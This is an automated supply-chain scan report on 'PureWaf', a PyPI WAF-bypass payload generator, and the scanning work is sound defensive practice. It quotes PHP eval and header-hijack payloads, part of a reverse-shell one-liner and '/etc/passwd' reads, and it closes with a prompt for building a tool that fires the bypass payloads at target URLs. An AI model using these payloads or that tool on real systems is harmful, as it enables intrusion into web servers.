PureWaf

v2.1.2 suspicious
7.0
High Risk

WAF Bypass Payload Generator

๐Ÿค– AI Analysis

Final verdict: SUSPICIOUS

The package exhibits high obfuscation and credential risks, suggesting potential malicious intent. While the metadata risk is lower, the combination of these factors raises concerns about a possible supply-chain attack.

  • High obfuscation risk due to PHP code execution patterns
  • Potential credential harvesting through references to '/etc/passwd'
Per-check LLM notes
  • Obfuscation: The presence of PHP code execution patterns and obfuscated code suggests potential for malicious activity.
  • Credentials: References to '/etc/passwd' and attempts to access system files indicate a risk of credential harvesting.
  • Metadata: The maintainer has only one package and lacks PyPI classifiers, indicating potential low effort or inexperience which may raise suspicion.

๐Ÿ”ฌ Heuristic Checks

โš  Outbound Network Calls score 3.0

Found 2 network call pattern(s)

  • i in range(1,20): res = requests.post(url=url, params=params, files=file) if "flag" in res.te
  • + "-" * 1000000 + '"}' res = requests.post(url=url, data={"letter": payload}) print(res.text) """
โš  Code Obfuscation score 10.0

Found 6 obfuscation pattern(s)

  • ?", "system(", "echo ", "$", "eval(", "assert(")): return "php_code" re
  • "require_once(", "eval(", "assert(", "system(", "passthr
  • f^%a0%b8%ba%ab);$_();", "eval(pos(get_defined_vars()));", "print_r(getallheaders());"
  • LE_HIJACK_TEMPLATES = [ "eval(array_pop(next(get_defined_vars())));", ] NON_ALNUM_ASSE
  • t_r(getallheaders());", "eval(next(getallheaders()));", } # ่งฆๅ‘ๅ˜้‡ๅŠซๆŒ็š„ๆ็คบ VARIABLE_HIJACK
  • IP_TRIGGER_PAYLOADS = { "eval(array_pop(next(get_defined_vars())));", } ASSERT_POST_TI
โš  Shell / Subprocess Execution score 10.0

Found 5 shell execution pattern(s)

  • try: proc = subprocess.run( [php_bin], input=script.enc
  • try: proc = subprocess.run( [php_bin, str(script_path)],
  • name): proc = subprocess.run( [php_bin, "-l", os.path.join(FIXTURE_DI
  • (script): proc = subprocess.run( [php_bin], input=script.e
  • (),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/sh\")'", ] PHPINFO_TEMPLATES = [ "php -r 'ph
โš  Credential Harvesting score 10.0

Found 5 credential access pattern(s)

  • "{path}", "/etc/passwd", ], } # ๆ นๆฎ sanitizer ่งฆๅ‘ใ€‚ AUTO_ESCAPESHELLARG_GAD
  • EX, flagfile="/etc/passwd", log_level="INFO", ),
  • al(result.shortest_flag, "rev /etc/passwd") self.assertNotIn("\\", result.shortest_root)
  • e", flagfile="/etc/passwd", read_env=True, reflect_sh
  • assertEqual(config.flagfile, "/etc/passwd") self.assertTrue(config.read_env) self.ass
โœ“ Typosquatting

No typosquatting candidates detected

โœ“ Registered Email Domain

No author email provided

โœ“ Suspicious Page Links

All external links appear legitimate

โœ“ Git Repository History

Repository PureStream108/PureWaf appears legitimate

โš  Maintainer History score 4.0

2 maintainer concern(s) found

  • Author "Pure Stream" appears to have only 1 package on PyPI (new or inactive account)
  • Package has no PyPI classifiers (low effort / metadata quality)
โœ“ Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

๐Ÿ’ก AI App Starter Prompt

Use this prompt to build a project with PureWaf 
Your task is to develop a fully-functional mini-application called 'WafBuster' that leverages the 'PureWaf' package to generate payloads designed to bypass Web Application Firewalls (WAFs). This tool will be useful for security professionals who need to test the effectiveness of their WAF configurations against potential evasion techniques. Hereโ€™s a detailed breakdown of what your application should include and how it should work:

1. **User Interface**: Design a simple yet intuitive command-line interface (CLI) where users can input parameters such as target URL, HTTP method, and type of payload they wish to generate.
2. **Payload Generation**: Utilize the core functionalities of the 'PureWaf' package to dynamically generate payloads based on user inputs. Ensure that the application supports at least three types of common evasion techniques: encoding, obfuscation, and polymorphism.
3. **Testing Environment**: Integrate a basic testing mechanism within the application that allows users to immediately send the generated payloads to the specified target URL using the chosen HTTP method (e.g., GET, POST).
4. **Response Analysis**: After sending the payload, the application should analyze the response from the server to determine if the WAF was successfully bypassed. Provide feedback to the user indicating whether the payload was effective or not.
5. **Logging**: Implement a logging feature that records each test attempt, including the payload used, the response received, and the outcome of the test.
6. **Security Considerations**: Ensure that the application includes a disclaimer about ethical hacking guidelines and warns users against using the tool for malicious purposes.
7. **Documentation**: Create comprehensive documentation explaining how to install and use the application, along with examples of typical use cases.

Remember to leverage the 'PureWaf' package's capabilities to make your application robust and versatile. Your goal is to create a powerful yet easy-to-use tool that helps security experts enhance the security of their web applications.